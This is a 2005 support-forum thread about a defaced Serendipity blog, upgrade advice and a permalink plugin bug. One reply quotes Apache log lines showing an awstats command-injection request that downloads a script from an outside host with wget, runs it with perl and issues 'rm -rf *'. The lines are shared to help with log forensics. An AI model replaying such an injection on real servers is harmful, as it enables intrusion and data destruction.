Page 1 of 1
XTech Inc
Posted: Tue Jul 05, 2005 5:54 am
by davecjr
I guess I've been owned! My website was doing fine and I got home tonight to find it only now says:
XTech Inc
And I guess I'm not the only one. Anybody else have the same problem and know what to do about it before I spend too much time trying to figure it out? My domain name is
www.thecockrells.com.
Posted: Tue Jul 05, 2005 6:11 am
by davecjr
Well it seems replacing the index.php got my site back up and running but I hope that's all it messed up. Anybody else have this problem? Anybody know why or how this could have happened? I did a search for XTech Inc and found that they have defaced a bunch of websites recently. I was running a nightly snapshot dated 20050613 if that helps anyone.
Posted: Tue Jul 05, 2005 8:46 am
by winkiller
If you blame serendipity it may be because of you not upgrading to 0.8.2/latest svn snapshot after the XMLRPC issues were fixed.
Posted: Tue Jul 05, 2005 2:58 pm
by davecjr
I really wasn't trying to complain or blame anyone. I knew about the update and can't remember if I did it but will do a little more reading! I just wanted to let the right folks know just in case there were more to it.
Posted: Tue Jul 05, 2005 5:22 pm
by winkiller
As of know there doesn't seem more to it
Sad to hear they hit you.
Perhaps you should change your passwords on that webhost for security reasons unless you know that absolutely nothing could have happened.
Posted: Tue Jul 05, 2005 5:53 pm
by davecjr
I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
thx in advance...
Posted: Tue Jul 05, 2005 6:43 pm
by kidgoo
davecjr wrote:I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
thx in advance...
Hi,
Version 0.9 isn't to beta yet...it's currently at alpha-3. That said, it's what I use as my main blog, so it's pretty stable.
Snapshots for developmental versions are usually at
http://s9y.org/12.html, but I assume because of the hardware problems with the server, the snapshots aren't working right.
You can grab the sources from SVN if you really want, but I'd just recomend upgrading to 0.8.2 from the tarball on the s9y downloads page...
This is just my being curious, but have you checked your webserver logs to see how it was compromised? The easiest way, if you have apache, is to grep -R 'wget' /var/log/apache*, as most of the script kiddies try to use wget...
Posted: Tue Jul 05, 2005 8:09 pm
by davecjr
I may not have mentioned it but I am on 9 alpha 3 and I was using the snapshot dated 0613 but didn't know where I could download the entire zip since they weren't listed on
http://s9y.org/12.html anymore.
I did look through the logs but I don't guess I know what I'm looking for.
Posted: Tue Jul 05, 2005 9:37 pm
by kidgoo
Sorry...missed that you were running a snapshot...
You could use SVN to directly download s9y from berlios. Look at
http://developer.berlios.de/svn/?group_id=2573 for information.
About the logs, what you're looking for is anything that's "funny." Something that is very, very funny is that there are wget commands in an apache error or access log. A server I admin was recently hacked because a user installed an old, insecure version of a stats program. This is what the hacking attempted looked like in my logs:
Code: Select all
access.log:
66.159.247.81 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf
*| HTTP/1.1" 400 373 "-" "-"
error.log:
[Mon Jun 27 18:57:00 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 19:01:57 2005] [error] mod_gzip: TRANSMIT_ERROR:0
--19:59:40-- http://lamer.biz/sesssiune
=> `sesssiune'
Resolving lamer.biz... 82.165.128.204
Connecting to lamer.biz[82.165.128.204]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,811 [text/plain]
0K .......... .......... 100% 293.60 KB/s
19:59:40 (293.60 KB/s) - `sesssiune' saved [20811/20811]
sh: line 1: /awstats.main.conf: No such file or directory
[Mon Jun 27 19:59:44 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesssiune;perl%20sesssiune;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 20:04:41 2005] [error] mod_gzip: TRANSMIT_ERROR:0
This is all very funny for apache to be doing...
Posted: Wed Jul 06, 2005 6:01 pm
by davecjr
I didn't notice anything that I thought was too funny but will dig more. I had something else happen today that I hope isn't related but I haven't done anything else but post an article since I fixed the XTech problem.
Could this be related to permalink problems? I added the permalink plugin a while ago but never really used it. I added an article to my blog this morning and now all my links to articles just point to:
http://www.thecockrells.com/blog/permalink/UNKNOWN.html
If it isn't possible for something like this to be related to the xml-rpc issue, any ideas?!
Again thanks in advance...
Posted: Wed Jul 06, 2005 6:25 pm
by kidgoo
That is plugin related. It looks like you've installed the custom permalink plugin, but haven't been changing the default. If you haven't used it, I'd just remove the custom permalink plugin...
Posted: Wed Jul 06, 2005 6:35 pm
by garvinhicking
Indeed, it slipped my mind when having patched the plugin to adjust the right permalink to use if a permalink is non-unique.
Will change this this weekend
Regards,
Garvin
Posted: Wed Jul 06, 2005 7:45 pm
by davecjr
I thought it had to be installed for some other plugins like the contact form but outside of that, I haven't used it but had considered using it. I just wonder why it started acting funny today. Like I said, I've had it installed for a little while now and never changed anything associated with it and this just started acting like this today.
I'll just uninstall anyway. Earlier I asked about a place to download a snapshot as a single download like you once could. I appreciate someone pointing me to the Berlios site but I had already looked there and couldn't find a way to download the entire package instead of single files. Am I missing something or is that just not available anymore?
Thanks
Posted: Thu Jul 07, 2005 4:50 pm
by garvinhicking
The snapshots are currently not available, that is right. They will be put online again once our server is running at full speed again.
Regards,
Garvin